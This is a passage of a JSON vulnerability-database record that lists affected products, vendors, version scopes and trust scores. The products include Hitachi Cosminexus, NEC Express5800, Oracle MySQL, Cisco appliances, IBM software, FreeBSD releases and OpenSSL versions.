"ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v6.2" }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1.x" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.7.12 and earlier" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1t" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.2" }, { "model": "leap", "scope": null, "trust": 0.8, "vendor": "opensuse", "version": null }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "7.0" }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "ip38x/3000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ip38x/1200", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.4" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.30 and earlier" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "netvisorpro 6.1" }, { "model": "ip38x/810", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.3" }, { "model": "ip38x/n500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series sg3600lm/lg/lj v6.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "business connect v7.1.1" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v4.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11 and later" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7.2)" }, { "model": "ip38x/sr100", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 6)" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.0" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "6.2" }, { "model": "enterprisedirectoryserver", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver6.1 to v8.0" }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v7.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series intersecvm/sg v1.2" }, { "model": "ip38x/1210", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2.x" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.8, "vendor": "red hat", "version": "(v. 7)" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "ip38x/3500", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ip38x/fw120", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "opensuse", "scope": null, "trust": 0.8, "vendor": "opensuse", "version": null }, { "model": "ip38x/5000", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle access manager 10.1.4.x" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sg series univerge sg3000lg/lj" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "paging server", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "11.5.1" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.6, "vendor": "cisco", "version": "1000v" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "ironport encryption appliance", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "spa51x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.3" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "security network controller 1.0.3361m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "network health framework", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa232d multi-line dect ata", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2.1" }, { "model": "unified series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "780011.5.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.2" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.22" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.6(3)" }, { "model": "10.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.2" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "emergency responder", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.2" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "nexus series blade switches 0.9.8zf", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "telepresence isdn link", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.1.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "project openssl 1.0.2g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.6" }, { "model": "unified intelligent contact management enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.51" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5.1.131" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "mediasense 9.0", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "abyp-4tl-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.8" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "cognos business intelligence interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.119" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "10.1-release-p26", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.8" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "prime collaboration assurance sp1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "tivoli netcool system service monitors fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.29" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "intelligent automation for cloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.8" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3361" }, { "model": "10.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13-34" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.20" }, { "model": "im and presence service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "ata analog telephone adaptor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1879.2.5" }, { "model": "tivoli netcool system service monitors fp15", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5(2)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.2.23" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.1" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central 1.5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration deployment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "mobile foundation consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "series ip phones vpn feature", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8800-11.5.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3394" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "project openssl 1.0.1t", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p28", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "webex recording playback client", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p38", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.6" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.10.1" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "9.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "44000" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.16-37" }, { "model": "10.2-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "spa50x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-01" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.24" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.0" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0" }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "anyconnect secure mobility client", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87100" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4-23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.1.2" }, { "model": "10.2-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "10.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.25-57" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-109" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-43" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "workload deployer if12", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.7" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus intercloud", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "ips", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "unified workforce optimization quality management sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "meetingplace", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.7" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.913" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0.1.7" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.17" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "webex messenger service ep1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.9.9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "mediasense", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8961" }, { "model": "10.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified wireless ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.1-release-p27", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa122 ata with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "webex meeting center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "webex node for mcs", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.12.9.8" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2.8" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "10.2-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cloud manager with openstack interix fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "unified sip proxy", "scope": "eq", "trust": 0.3, 